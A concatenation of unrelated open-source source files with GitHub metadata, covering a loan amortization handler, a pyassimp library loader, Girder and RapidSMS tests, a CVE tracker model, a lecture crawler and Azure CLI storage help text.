month_name = datetime.date(year, month, 1).strftime('%B')
installment = Installment(year, month_name, original_balance, principal, interest, monthly_installment, current_balance)
installments.append(installment)
year, month = next_month(year, month)
return installments
class MainHandler(webapp2.RequestHandler):
def get(self):
loan = {}
schedule = []
total_interest = None
form = ScheduleForm(self.request.GET)
if self.request.GET and form.validate():
amount = form.amount.data
interest_rate = form.interest_rate.data
period = form.period.data
period_type = form.period_type.data
start_date = form.start_date.data or datetime.date.today()
loan = form.data.copy()
if not form.start_date.data:
loan['start_date'] = start_date
logging.info('Amount: {0:,.2f}\tInterest Rate: {1:,.2f}\tPeriod: '
'{2}\tPeriod Type: {3}\tStart Date: {4}'.format(amount,
interest_rate, period, period_type, start_date))
schedule = generate_schedule(amount, interest_rate, period, period_type, start_date)
total_interest = sum(map(itemgetter(4), schedule))
self.response.write(render_template('index.html',
form=form,
loan=loan,
schedule=schedule,
total_interest=total_interest,
)
)
app = webapp2.WSGIApplication([
('/', MainHandler),
], debug=True)
| {
"content_hash": "a2f378410302d9b2e43f2b5028e5dd11",
"timestamp": "",
"source": "github",
"line_count": 153,
"max_line_length": 128,
"avg_line_length": 30.11764705882353,
"alnum_prop": 0.6078559027777778,
"repo_name": "gledi/amortsched",
"id": "7a070016c5520bef3b08d1a392437f654be24012",
"size": "4630",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "main.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "19494"
},
{
"name": "HTML",
"bytes": "6432"
},
{
"name": "JavaScript",
"bytes": "32518"
},
{
"name": "Python",
"bytes": "184762"
}
],
"symlink_target": ""
} |
"""
Some fancy helper functions.
"""
import os
import ctypes
from ctypes import POINTER
import operator
import numpy
from numpy import linalg
import logging;logger = logging.getLogger("pyassimp")
from .errors import AssimpError
additional_dirs, ext_whitelist = [],[]
# populate search directories and lists of allowed file extensions
# depending on the platform we're running on.
if os.name=='posix':
additional_dirs.append('/usr/lib/')
additional_dirs.append('/usr/local/lib/')
# note - this won't catch libassimp.so.N.n, but
# currently there's always a symlink called
# libassimp.so in /usr/local/lib.
ext_whitelist.append('.so')
elif os.name=='nt':
ext_whitelist.append('.dll')
path_dirs = os.environ['PATH'].split(';')
for dir_candidate in path_dirs:
if 'assimp' in dir_candidate.lower():
additional_dirs.append(dir_candidate)
#print(additional_dirs)
def vec2tuple(x):
""" Converts a VECTOR3D to a Tuple """
return (x.x, x.y, x.z)
def transform(vector3, matrix4x4):
""" Apply a transformation matrix on a 3D vector.
:param vector3: a numpy array with 3 elements
:param matrix4x4: a numpy 4x4 matrix
"""
return numpy.dot(matrix4x4, numpy.append(vector3, 1.))
def get_bounding_box(scene):
bb_min = [1e10, 1e10, 1e10] # x,y,z
bb_max = [-1e10, -1e10, -1e10] # x,y,z
return get_bounding_box_for_node(scene.rootnode, bb_min, bb_max, linalg.inv(scene.rootnode.transformation))
def get_bounding_box_for_node(node, bb_min, bb_max, transformation):
transformation = numpy.dot(transformation, node.transformation)
for mesh in node.meshes:
for v in mesh.vertices:
v = transform(v, transformation)
bb_min[0] = min(bb_min[0], v[0])
bb_min[1] = min(bb_min[1], v[1])
bb_min[2] = min(bb_min[2], v[2])
bb_max[0] = max(bb_max[0], v[0])
bb_max[1] = max(bb_max[1], v[1])
bb_max[2] = max(bb_max[2], v[2])
for child in node.children:
bb_min, bb_max = get_bounding_box_for_node(child, bb_min, bb_max, transformation)
return bb_min, bb_max
def try_load_functions(library,dll,candidates):
"""try to functbind to aiImportFile and aiReleaseImport
library - path to current lib
dll - ctypes handle to it
candidates - receives matching candidates
They serve as signal functions to detect assimp,
also they're currently the only functions we need.
insert (library,aiImportFile,aiReleaseImport,dll)
into 'candidates' if successful.
"""
try:
load = dll.aiImportFile
release = dll.aiReleaseImport
except AttributeError:
#OK, this is a library, but it has not the functions we need
pass
else:
#Library found!
from .structs import Scene
load.restype = POINTER(Scene)
candidates.append((library, load, release, dll))
def search_library():
"""Loads the assimp-Library.
result (load-function, release-function)
exception AssimpError if no library is found
"""
#this path
folder = os.path.dirname(__file__)
# silence 'DLL not found' message boxes on win
try:
ctypes.windll.kernel32.SetErrorMode(0x8007)
except AttributeError:
pass
candidates = []
# test every file
for curfolder in [folder]+additional_dirs:
for filename in os.listdir(curfolder):
# our minimum requirement for candidates is that
# they should contain 'assimp' somewhere in
# their name
if filename.lower().find('assimp')==-1 or\
os.path.splitext(filename)[-1].lower() not in ext_whitelist:
continue
library = os.path.join(curfolder, filename)
logger.debug('Try ' + library)
try:
dll = ctypes.cdll.LoadLibrary(library)
except Exception as e:
logger.warning(str(e))
# OK, this except is evil. But different OSs will throw different
# errors. So just ignore any errors.
continue
try_load_functions(library,dll,candidates)
if not candidates:
# no library found
raise AssimpError("assimp library not found")
else:
# get the newest library
candidates = map(lambda x: (os.lstat(x[0])[-2], x), candidates)
res = max(candidates, key=operator.itemgetter(0))[1]
logger.debug('Using assimp library located at ' + res[0])
# XXX: if there are 1000 dll/so files containing 'assimp'
# in their name, do we have all of them in our address
# space now until gc kicks in?
# XXX: take version postfix of the .so on linux?
return res[1:]
def hasattr_silent(object, name):
"""
Calls hasttr() with the given parameters and preserves the legacy (pre-Python 3.2)
functionality of silently catching exceptions.
Returns the result of hasatter() or False if an exception was raised.
"""
try:
return hasattr(object, name)
except:
return False
| {
"content_hash": "7d8f27a979955fe4688c2c08aa62b011",
"timestamp": "",
"source": "github",
"line_count": 170,
"max_line_length": 111,
"avg_line_length": 30.729411764705883,
"alnum_prop": 0.6196401225114855,
"repo_name": "ivansoban/ILEngine",
"id": "4e9f8ec69d909f115702da7ea86bebcf78a00cd6",
"size": "5248",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "thirdparty/assimp/port/PyAssimp/pyassimp/helper.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C",
"bytes": "516"
},
{
"name": "C++",
"bytes": "37989"
}
],
"symlink_target": ""
} |
import json
import os
from .. import base
from girder.api.rest import endpoint
from girder.utility import config
def setUpModule():
pluginRoot = os.path.join(os.path.dirname(os.path.dirname(__file__)),
'test_plugins')
conf = config.getConfig()
conf['plugins'] = {'plugin_directory': pluginRoot}
base.enabledPlugins = ['test_plugin']
base.startServer()
def tearDownModule():
base.stopServer()
class TestEndpointDecoratorException(base.TestCase):
"""Tests the endpoint decorator exception handling."""
@endpoint
def pointlessEndpointAscii(self, path, params):
raise Exception('You did something wrong.')
@endpoint
def pointlessEndpointUnicode(self, path, params):
raise Exception(u'\u0400 cannot be converted to ascii.')
@endpoint
def pointlessEndpointBytes(self, path, params):
raise Exception('\x80\x80 cannot be converted to unicode or ascii.')
def testEndpointExceptionAscii(self):
resp = self.pointlessEndpointAscii('', {}).decode()
obj = json.loads(resp)
self.assertEqual(obj['type'], 'internal')
def testEndpointExceptionUnicode(self):
resp = self.pointlessEndpointUnicode('', {}).decode('utf8')
obj = json.loads(resp)
self.assertEqual(obj['type'], 'internal')
def testEndpointExceptionBytes(self):
resp = self.pointlessEndpointBytes('', {}).decode('utf8')
obj = json.loads(resp)
self.assertEqual(obj['type'], 'internal')
def testBoundHandlerDecorator(self):
resp = self.request('/collection/unbound/default', params={
'val': False
})
self.assertStatusOk(resp)
self.assertEqual(resp.json, True)
resp = self.request('/collection/unbound/explicit')
self.assertStatusOk(resp)
self.assertEqual(resp.json, {
'name': 'collection',
'user': None
})
def testRawResponse(self):
resp = self.request('/other/rawWithDecorator', isJson=False)
self.assertStatusOk(resp)
self.assertEqual(self.getBody(resp), 'this is a raw response')
resp = self.request('/other/rawInternal', isJson=False)
self.assertStatusOk(resp)
self.assertEqual(self.getBody(resp), 'this is also a raw response')
| {
"content_hash": "6d296e3dcc1fbd49161915c3e1f106a4",
"timestamp": "",
"source": "github",
"line_count": 74,
"max_line_length": 76,
"avg_line_length": 31.58108108108108,
"alnum_prop": 0.6469833119383825,
"repo_name": "msmolens/girder",
"id": "78fcd6d0585ee7103297f822d1418179ae0803b3",
"size": "3126",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "tests/cases/rest_decorator_test.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CMake",
"bytes": "51477"
},
{
"name": "CSS",
"bytes": "42637"
},
{
"name": "HTML",
"bytes": "106882"
},
{
"name": "JavaScript",
"bytes": "955299"
},
{
"name": "Mako",
"bytes": "5674"
},
{
"name": "Python",
"bytes": "1416993"
},
{
"name": "Ruby",
"bytes": "12419"
},
{
"name": "Shell",
"bytes": "9961"
}
],
"symlink_target": ""
} |
from datetime import datetime
from tracker import db
from tracker.util import issue_to_numeric
from .enum import Remote
from .enum import Severity
cve_id_regex = r'^(CVE\-\d{4}\-\d{4,})$'
issue_types = [
'unknown',
'access restriction bypass',
'arbitrary code execution',
'arbitrary command execution',
'arbitrary file overwrite',
'arbitrary filesystem access',
'arbitrary file upload',
'authentication bypass',
'certificate verification bypass',
'content spoofing',
'cross-site request forgery',
'cross-site scripting',
'denial of service',
'directory traversal',
'incorrect calculation',
'information disclosure',
'insufficient validation',
'man-in-the-middle',
'open redirect',
'private key recovery',
'privilege escalation',
'proxy injection',
'same-origin policy bypass',
'sandbox escape',
'session hijacking',
'signature forgery',
'silent downgrade',
'sql injection',
'time alteration',
'url request injection',
'xml external entity injection'
]
class CVE(db.Model):
DESCRIPTION_LENGTH = 4096
REFERENCES_LENGTH = 4096
NOTES_LENGTH = 4096
__versioned__ = {}
__tablename__ = 'cve'
id = db.Column(db.String(15), index=True, unique=True, primary_key=True)
issue_type = db.Column(db.String(64), default='unknown')
description = db.Column(db.String(DESCRIPTION_LENGTH))
severity = db.Column(Severity.as_type(), nullable=False, default=Severity.unknown)
remote = db.Column(Remote.as_type(), nullable=False, default=Remote.unknown)
reference = db.Column(db.String(REFERENCES_LENGTH))
notes = db.Column(db.String(NOTES_LENGTH))
created = db.Column(db.DateTime, default=datetime.utcnow, nullable=False, index=True)
changed = db.Column(db.DateTime, default=datetime.utcnow, nullable=False, index=True)
@staticmethod
def new(id):
return CVE(id=id,
issue_type='unknown',
description='',
severity=Severity.unknown,
remote=Remote.unknown,
reference='',
notes='')
def __repr__(self):
return '{}'.format(self.id)
@property
def numerical_repr(self):
return issue_to_numeric(self.id)
def __gt__(self, other):
return self.numerical_repr > other.numerical_repr
def __lt__(self, other):
return self.numerical_repr < other.numerical_repr
| {
"content_hash": "64dd8a937f911aae8a88ecf6b651283e",
"timestamp": "",
"source": "github",
"line_count": 85,
"max_line_length": 89,
"avg_line_length": 29.36470588235294,
"alnum_prop": 0.6394230769230769,
"repo_name": "jelly/arch-security-tracker",
"id": "0adcdbed434ec385adc7940709d7330d60c2e821",
"size": "2496",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "tracker/model/cve.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "9806"
},
{
"name": "HTML",
"bytes": "65601"
},
{
"name": "Makefile",
"bytes": "1441"
},
{
"name": "Mako",
"bytes": "494"
},
{
"name": "Python",
"bytes": "345600"
}
],
"symlink_target": ""
} |
from django.test import TestCase
from django.test.utils import override_settings
from rapidsms.contrib.echo.handlers.echo import EchoHandler
from rapidsms.contrib.echo.handlers.ping import PingHandler
from rapidsms.contrib.handlers.utils import get_handlers
import mock
__all__ = ['TestGetHandlers']
class TestGetHandlers(TestCase):
DEFAULT_APP = 'rapidsms.contrib.default' # Defines no handlers
ECHO_APP = 'rapidsms.contrib.echo' # Defines exactly 2 handlers
ECHO_HANDLER = 'rapidsms.contrib.echo.handlers.echo'
PING_HANDLER = 'rapidsms.contrib.echo.handlers.ping'
ECHO_HANDLER_CLASS = 'rapidsms.contrib.echo.handlers.echo.EchoHandler'
PING_HANDLER_CLASS = 'rapidsms.contrib.echo.handlers.ping.PingHandler'
def setUp(self):
# Used with override_settings, so that we test in a predictable
# environment.
self.settings = {
'INSTALLED_APPS': [],
'INSTALLED_HANDLERS': None,
'EXCLUDED_HANDLERS': [],
'RAPIDSMS_HANDLERS_EXCLUDE_APPS': [],
}
def _check_get_handlers(self, *args):
with override_settings(**self.settings):
with mock.patch('rapidsms.contrib.handlers.utils.warn') as warn:
handlers = get_handlers()
self.assertEqual(set(handlers), set(args))
# If RAPIDSMS_HANDLERS is not defined, a deprecation warning is issued
self.assertEqual(warn.called, 'RAPIDSMS_HANDLERS' not in self.settings)
def test_no_installed_apps(self):
"""App should not load any handlers if there are no installed apps."""
self._check_get_handlers()
def test_no_relevant_installed_apps(self):
"""App should not load any handlers if no app contains handlers."""
self.settings['INSTALLED_APPS'] = [self.DEFAULT_APP]
self._check_get_handlers()
def test_installed_apps(self):
"""App should load handlers from any app in INSTALLED_APPS."""
self.settings['INSTALLED_APPS'] = [self.ECHO_APP]
self._check_get_handlers(EchoHandler, PingHandler)
def test_installed_handler__installed_apps(self):
"""
App should only include handlers listed in INSTALLED_HANDLERS, if it
is defined.
"""
self.settings['INSTALLED_APPS'] = [self.ECHO_APP]
self.settings['INSTALLED_HANDLERS'] = [self.PING_HANDLER]
self._check_get_handlers(PingHandler)
def test_installed_handlers__installed_apps(self):
"""
App should only include handlers listedin INSTALLED_HANDLERS, if it
is defined.
"""
self.settings['INSTALLED_APPS'] = [self.ECHO_APP]
self.settings['INSTALLED_HANDLERS'] = [self.PING_HANDLER,
self.ECHO_HANDLER]
self._check_get_handlers(PingHandler, EchoHandler)
def test_installed_handlers__no_installed_apps(self):
"""App should handle when an INSTALLED_HANDLER can't be found."""
self.settings['INSTALLED_HANDLERS'] = [self.PING_HANDLER]
self._check_get_handlers()
def test_installed_app(self):
"""App should use prefix matching to determine handlers to include."""
self.settings['INSTALLED_APPS'] = [self.ECHO_APP]
self.settings['INSTALLED_HANDLERS'] = [self.ECHO_APP]
self._check_get_handlers(EchoHandler, PingHandler)
def test_exclude_handlers__installed_apps(self):
"""App should exclude handlers listed in EXCLUDED_HANDLERS."""
self.settings['INSTALLED_APPS'] = [self.ECHO_APP]
self.settings['EXCLUDED_HANDLERS'] = [self.PING_HANDLER]
self._check_get_handlers(EchoHandler)
def test_exclude_handlers__no_installed_apps(self):
"""App should handle when an EXCLUDED_HANDLER can't be found."""
self.settings['EXCLUDED_HANDLERS'] = [self.PING_HANDLER]
self._check_get_handlers()
def test_exclude_app(self):
"""App should use prefix matching to determine handlers to exclude."""
self.settings['INSTALLED_APPS'] = [self.ECHO_APP]
self.settings['EXCLUDED_HANDLERS'] = [self.ECHO_APP]
self._check_get_handlers()
def test_empty_rapidsms_handlers(self):
# If RAPIDSMS_HANDLERS is empty, no handlers are loaded.
self.settings['INSTALLED_APPS'] = [self.ECHO_APP]
self.settings['INSTALLED_HANDLERS'] = [self.ECHO_APP]
self.settings['RAPIDSMS_HANDLERS'] = []
self._check_get_handlers()
def test_rapidsms_handlers(self):
# If RAPIDSMS_HANDLERS is set, it completely controls which handlers
# are loaded.
self.settings['INSTALLED_APPS'] = [self.DEFAULT_APP]
self.settings['INSTALLED_HANDLERS'] = []
self.settings['EXCLUDED_HANDLERS'] = [self.PING_HANDLER]
self.settings['RAPIDSMS_HANDLERS'] = [
self.ECHO_HANDLER_CLASS,
self.PING_HANDLER_CLASS
]
self._check_get_handlers(EchoHandler, PingHandler)
| {
"content_hash": "2ab0e233217fbef09f8c1cbba5f76437",
"timestamp": "",
"source": "github",
"line_count": 118,
"max_line_length": 79,
"avg_line_length": 42.16101694915254,
"alnum_prop": 0.652462311557789,
"repo_name": "eHealthAfrica/rapidsms",
"id": "d9c1d2666b2beebb1ed3c1d64e8c3b8a411362d9",
"size": "5027",
"binary": false,
"copies": "7",
"ref": "refs/heads/develop",
"path": "rapidsms/contrib/handlers/tests/utils.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "27100"
},
{
"name": "JavaScript",
"bytes": "16887"
},
{
"name": "Python",
"bytes": "350060"
},
{
"name": "Shell",
"bytes": "5100"
}
],
"symlink_target": ""
} |
from django.core.management.base import BaseCommand, CommandError
from stalku.core.management.commands._lectures import crawl_institutes, \
crawl_lectures_grad, crawl_lecture_grad
from stalku.core.models import Lecture, LectureInstance, Institute
class Command(BaseCommand):
help = 'Crawls DAC website'
def add_arguments(self, parser):
parser.add_argument('year', type=int,
help='Year to get lectures from.')
parser.add_argument('semester', type=int,
help='Semester to get lectures from.')
parser.add_argument('degree_level', nargs='?', default='grad',
type=str, choices=[code for code, _ in Lecture.DEGREE_LEVELS],
help='Specify the degree level to get information from.')
def handle(self, *args, **options):
institutes = crawl_institutes(**options)
self.stdout.write('Institutes for \'{}\' ({}):'.format(
options['degree_level'],
len(institutes))
)
for institute in institutes:
self.stdout.write('\t- {}'.format(institute['name']))
Institute.objects.update_or_create(**institute)
for institute in Institute.objects.all():
# Getting lectures
code, name = institute.code, institute.name
lectures = crawl_lectures_grad(code, **options)
self.stdout.write('Getting lectures for {}: {} found. '.format(name, len(lectures)))
existing_lecs = [x['code'] for x in Lecture.objects.values('code')]
for l in [lec for lec in lectures if lec.replace('_', ' ') not in existing_lecs]:
try:
lecture_args = crawl_lecture_grad(l, **options)
lecture_args['institute'] = institute
groups = lecture_args.pop('groups', [])
obj = Lecture.objects.create(**lecture_args)
for g in groups:
LectureInstance.objects.create(
lecture=obj, group=g,
year=options['year'],
semester=options['semester']
)
except Exception as e:
raise CommandError('Error trying to parse {}: {}'.format(l, e))
| {
"content_hash": "68632e58de4585e9e1a0239376395150",
"timestamp": "",
"source": "github",
"line_count": 54,
"max_line_length": 96,
"avg_line_length": 43.77777777777778,
"alnum_prop": 0.5516074450084603,
"repo_name": "henriquenogueira/stalku",
"id": "46cfc128388cc7bff839d3e37ecf3d36614721cd",
"size": "2364",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "stalku/core/management/commands/crawl_lectures.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "25714"
}
],
"symlink_target": ""
} |
from azure.cli.core.help_files import helps
# pylint: disable=line-too-long, too-many-lines
helps['storage entity insert'] = """
type: command
short-summary: Insert an entity into a table.
parameters:
- name: --table-name -t
type: string
short-summary: The name of the table to insert the entity into.
- name: --entity -e
type: list
short-summary: A space-separated list of key=value pairs. Must contain a PartitionKey and a RowKey.
long-summary: The PartitionKey and RowKey must be unique within the table, and may be up to 64Kb in size. If using an integer value as a key,
convert it to a fixed-width string which can be canonically sorted.
For example, convert the integer value 1 to the string value "0000001" to ensure proper sorting.
- name: --if-exists
type: string
short-summary: Behavior when an entity already exists for the specified PartitionKey and RowKey.
- name: --timeout
short-summary: The server timeout, expressed in seconds.
"""
helps['storage blob upload'] = """
type: command
short-summary: Upload a file to a storage blob.
long-summary: Creates a new blob from a file path, or updates the content of an existing blob with automatic chunking and progress notifications.
examples:
- name: Upload to a blob.
text: az storage blob upload -f /path/to/file -c MyContainer -n MyBlob
"""
helps['storage file upload'] = """
type: command
short-summary: Upload a file to a share that uses the SMB 3.0 protocol.
long-summary: Creates or updates an Azure file from a source path with automatic chunking and progress notifications.
examples:
- name: Upload to a local file to a share.
text: az storage file upload -s MyShare -source /path/to/file
"""
helps['storage blob show'] = """
type: command
short-summary: Get the details of a blob.
examples:
- name: Show all properties of a blob.
text: az storage blob show -c MyContainer -n MyBlob
"""
helps['storage blob delete'] = """
type: command
short-summary: Mark a blob or snapshot for deletion.
long-summary: >
The blob is marked for later deletion during garbage collection. In order to delete a blob, all of its snapshots must also be deleted.
Both can be removed at the same time.
examples:
- name: Delete a blob.
text: az storage blob delete -c MyContainer -n MyBlob
"""
helps['storage account create'] = """
type: command
short-summary: Create a storage account.
examples:
- name: Create a storage account 'MyStorageAccount' in resource group 'MyResourceGroup' in the West US region with locally redundant storage.
text: az storage account create -n MyStorageAccount -g MyResourceGroup -l westus --sku Standard_LRS
min_profile: latest
- name: Create a storage account 'MyStorageAccount' in resource group 'MyResourceGroup' in the West US region with locally redundant storage.
text: az storage account create -n MyStorageAccount -g MyResourceGroup -l westus --account-type Standard_LRS
max_profile: 2017-03-09-profile
"""
helps['storage container create'] = """
type: command
short-summary: Create a container in a storage account.
examples:
- name: Create a storage container in a storage account.
text: az storage container create -n MyStorageContainer
- name: Create a storage container in a storage account and return an error if the container already exists.
text: az storage container create -n MyStorageContainer --fail-on-exist
"""
helps['storage account list'] = """
type: command
short-summary: List storage accounts.
examples:
- name: List all storage accounts in a subscription.
text: az storage account list
- name: List all storage accounts in a resource group.
text: az storage account list -g MyResourceGroup
"""
helps['storage account show'] = """
type: command
short-summary: Show storage account properties.
examples:
- name: Show properties for a storage account by resource ID.
text: az storage account show --ids /subscriptions/{SubID}/resourceGroups/{MyResourceGroup}/providers/Microsoft.Storage/storageAccounts/{MyStorageAccount}
- name: Show properties for a storage account using an account name and resource group.
text: az storage account show -g MyResourceGroup -n MyStorageAccount
"""
helps['storage blob list'] = """
type: command
short-summary: List storage blobs in a container.
examples:
- name: List all storage blobs in a container.
text: az storage blob list -c MyContainer
"""
helps['storage account delete'] = """
type: command
short-summary: Delete a storage account.
examples:
- name: Delete a storage account using a resource ID.
text: az storage account delete --ids /subscriptions/{SubID}/resourceGroups/{MyResourceGroup}/providers/Microsoft.Storage/storageAccounts/{MyStorageAccount}
- name: Delete a storage account using an account name and resource group.
text: az storage account delete -n MyStorageAccount -g MyResourceGroup
"""
helps['storage account show-connection-string'] = """
type: command
short-summary: Get the connection string for a storage account.
examples:
- name: Get a connection string for a storage account.
text: az storage account show-connection-string -g MyResourceGroup -n MyStorageAccount
"""
helps['storage'] = """
type: group
short-summary: Manage Azure Cloud Storage resources.
"""
helps['storage account'] = """
type: group
short-summary: Manage storage accounts.
"""
helps['storage account update'] = """
type: command
short-summary: Update the properties of a storage account.
"""
helps['storage account keys'] = """
type: group
short-summary: Manage storage account keys.
"""
helps['storage account keys list'] = """
type: command
short-summary: List the primary and secondary keys for a storage account.
examples:
- name: List the primary and secondary keys for a storage account.
text: az storage account keys list -g MyResourceGroup -n MyStorageAccount
"""
helps['storage blob'] = """
type: group
short-summary: Manage object storage for unstructured data (blobs).
"""
helps['storage blob exists'] = """
type: command
short-summary: Check for the existence of a blob in a container.
"""
helps['storage blob list'] = """
type: command
short-summary: List blobs in a given container.
"""
helps['storage blob copy'] = """
type: group
short-summary: Manage blob copy operations.
"""
helps['storage blob incremental-copy'] = """
type: group
short-summary: Manage blob incremental copy operations.
"""
helps['storage blob lease'] = """
type: group
short-summary: Manage storage blob leases.
"""
helps['storage blob metadata'] = """
type: group
short-summary: Manage blob metadata.
"""
helps['storage blob service-properties'] = """
type: group
short-summary: Manage storage blob service properties.
"""
helps['storage blob set-tier'] = """
type: command
short-summary: Set the block or page tiers on the blob.
long-summary: >
For block blob this command only supports block blob on standard storage accounts.
For page blob, this command only supports for page blobs on premium accounts.
"""
helps['storage blob copy start-batch'] = """
type: command
short-summary: Copy multiple blobs or files to a blob container.
parameters:
- name: --destination-container
type: string
short-summary: The blob container where the selected source files or blobs will be copied to.
- name: --pattern
type: string
short-summary: The pattern used for globbing files or blobs in the source. The supported patterns are '*', '?', '[seq', and '[!seq]'.
- name: --dryrun
type: bool
short-summary: List the files or blobs to be uploaded. No actual data transfer will occur.
- name: --source-account-name
type: string
short-summary: The source storage account from which the files or blobs are copied to the destination. If omitted, the source account is used.
- name: --source-account-key
type: string
short-summary: The account key for the source storage account.
- name: --source-container
type: string
short-summary: The source container from which blobs are copied.
- name: --source-share
type: string
short-summary: The source share from which files are copied.
- name: --source-uri
type: string
short-summary: A URI specifying a file share or blob container from which the files or blobs are copied.
long-summary: If the source is in another account, the source must either be public or be authenticated by using a shared access signature.
- name: --source-sas
type: string
short-summary: The shared access signature for the source storage account.
"""
helps['storage container'] = """
type: group
short-summary: Manage blob storage containers.
"""
helps['storage container exists'] = """
type: command
short-summary: Check for the existence of a storage container.
"""
helps['storage container list'] = """
type: command
short-summary: List containers in a storage account.
"""
helps['storage container lease'] = """
type: group
short-summary: Manage blob storage container leases.
"""
helps['storage container metadata'] = """
type: group
short-summary: Manage container metadata.
"""
helps['storage container policy'] = """
type: group
short-summary: Manage container stored access policies.
"""
helps['storage cors'] = """
type: group
short-summary: Manage storage service Cross-Origin Resource Sharing (CORS).
"""
helps['storage cors add'] = """
type: command
short-summary: Add a CORS rule to a storage account.
parameters:
- name: --services
short-summary: >
The storage service(s) to add rules to. Allowed options are: (b)lob, (f)ile,
(q)ueue, (t)able. Can be combined.
- name: --max-age
short-summary: The maximum number of seconds the client/browser should cache a preflight response.
- name: --origins
short-summary: List of origin domains that will be allowed via CORS, or "*" to allow all domains.
- name: --methods
short-summary: List of HTTP methods allowed to be executed by the origin.
- name: --allowed-headers
short-summary: List of response headers allowed to be part of the cross-origin request.
- name: --exposed-headers
short-summary: List of response headers to expose to CORS clients.
"""
helps['storage cors clear'] = """
type: command
short-summary: Remove all CORS rules from a storage account.
parameters:
- name: --services
short-summary: >
The storage service(s) to remove rules from. Allowed options are: (b)lob, (f)ile,
(q)ueue, (t)able. Can be combined.
"""
helps['storage cors list'] = """
type: command
short-summary: List all CORS rules for a storage account.
parameters:
- name: --services
short-summary: >
The storage service(s) to list rules for. Allowed options are: (b)lob, (f)ile,
(q)ueue, (t)able. Can be combined.
"""
helps['storage directory'] = """
type: group
short-summary: Manage file storage directories.
"""
helps['storage directory exists'] = """
type: command
short-summary: Check for the existence of a storage directory.
"""
helps['storage directory metadata'] = """
type: group
short-summary: Manage file storage directory metadata.
"""
helps['storage directory list'] = """
type: command
short-summary: List directories in a share.
"""
helps['storage entity'] = """
type: group
short-summary: Manage table storage entities.
"""
helps['storage entity query'] = """
type: command
short-summary: List entities which satisfy a query.
"""
helps['storage file'] = """
type: group
short-summary: Manage file shares that use the SMB 3.0 protocol.
"""
helps['storage file exists'] = """
type: command
short-summary: Check for the existence of a file.
"""
helps['storage file list'] = """
type: command
short-summary: List files and directories in a share.
parameters:
- name: --exclude-dir
type: bool
short-summary: List only files in the given share.
"""
helps['storage file copy'] = """
type: group
short-summary: Manage file copy operations.
"""
helps['storage file metadata'] = """
type: group
short-summary: Manage file metadata.
"""
helps['storage file upload-batch'] = """
type: command
short-summary: Upload files from a local directory to an Azure Storage File Share in a batch operation.
parameters:
- name: --source -s
type: string
short-summary: The directory to upload files from.
- name: --destination -d
type: string
short-summary: The destination of the upload operation.
long-summary: The destination can be the file share URL or the share name. When the destination is the share URL, the storage account name is parsed from the URL.
- name: --pattern
type: string
short-summary: The pattern used for file globbing. The supported patterns are '*', '?', '[seq', and '[!seq]'.
- name: --dryrun
type: bool
short-summary: List the files and blobs to be uploaded. No actual data transfer will occur.
- name: --max-connections
type: integer
short-summary: The maximum number of parallel connections to use. Default value is 1.
- name: --validate-content
type: bool
short-summary: If set, calculates an MD5 hash for each range of the file for validation.
long-summary: >
The storage service checks the hash of the content that has arrived is identical to the hash that was sent.
This is mostly valuable for detecting bitflips during transfer if using HTTP instead of HTTPS. This hash is not stored.
"""
helps['storage file download-batch'] = """
type: command
short-summary: Download files from an Azure Storage File Share to a local directory in a batch operation.
parameters:
- name: --source -s
type: string
short-summary: The source of the file download operation. The source can be the file share URL or the share name.
- name: --destination -d
type: string
short-summary: The local directory where the files are downloaded to. This directory must already exist.
- name: --pattern
type: string
short-summary: The pattern used for file globbing. The supported patterns are '*', '?', '[seq', and '[!seq]'.
- name: --dryrun
type: bool
short-summary: List the files and blobs to be downloaded. No actual data transfer will occur.
- name: --max-connections
type: integer
short-summary: The maximum number of parallel connections to use. Default value is 1.
- name: --validate-content
type: bool
short-summary: If set, calculates an MD5 hash for each range of the file for validation.
long-summary: >
The storage service checks the hash of the content that has arrived is identical to the hash that was sent.
This is mostly valuable for detecting bitflips during transfer if using HTTP instead of HTTPS. This hash is not stored.
"""
helps['storage file copy start-batch'] = """
type: command
short-summary: Copy multiple files or blobs to a file share.
parameters:
- name: --destination-share
type: string
short-summary: The file share where the source data is copied to.
- name: --destination-path
type: string
short-summary: The directory where the source data is copied to. If omitted, data is copied to the root directory.
- name: --pattern
type: string
short-summary: The pattern used for globbing files and blobs. The supported patterns are '*', '?', '[seq', and '[!seq]'.
- name: --dryrun
type: bool
short-summary: List the files and blobs to be copied. No actual data transfer will occur.
- name: --source-account-name
type: string
short-summary: The source storage account to copy the data from. If omitted, the destination account is used.
- name: --source-account-key
type: string
short-summary: The account key for the source storage account. If omitted, the active login is used to determine the account key.
- name: --source-container
type: string
short-summary: The source container blobs are copied from.
- name: --source-share
type: string
short-summary: The source share files are copied from.
- name: --source-uri
type: string
short-summary: A URI that specifies a the source file share or blob container.
long-summary: If the source is in another account, the source must either be public or authenticated via a shared access signature.
- name: --source-sas
type: string
short-summary: The shared access signature for the source storage account.
"""
helps['storage logging'] = """
type: group
short-summary: Manage storage service logging information.
"""
helps['storage logging show'] = """
type: command
short-summary: Show logging settings for a storage account.
"""
helps['storage logging update'] = """
type: command
short-summary: Update logging settings for a storage account.
"""
helps['storage message'] = """
type: group
short-summary: Manage queue storage messages.
"""
helps['storage metrics'] = """
type: group
short-summary: Manage storage service metrics.
"""
helps['storage metrics show'] = """
type: command
short-summary: Show metrics settings for a storage account.
"""
helps['storage metrics update'] = """
type: command
short-summary: Update metrics settings for a storage account.
"""
helps['storage queue'] = """
type: group
short-summary: Manage storage queues.
"""
helps['storage queue list'] = """
type: command
short-summary: List queues in a storage account.
"""
helps['storage queue metadata'] = """
type: group
short-summary: Manage the metadata for a storage queue.
"""
helps['storage queue policy'] = """
type: group
short-summary: Manage shared access policies for a storage queue.
"""
helps['storage share'] = """
type: group
short-summary: Manage file shares.
"""
helps['storage share exists'] = """
type: command
short-summary: Check for the existence of a file share.
"""
helps['storage share list'] = """
type: command
short-summary: List the file shares in a storage account.
"""
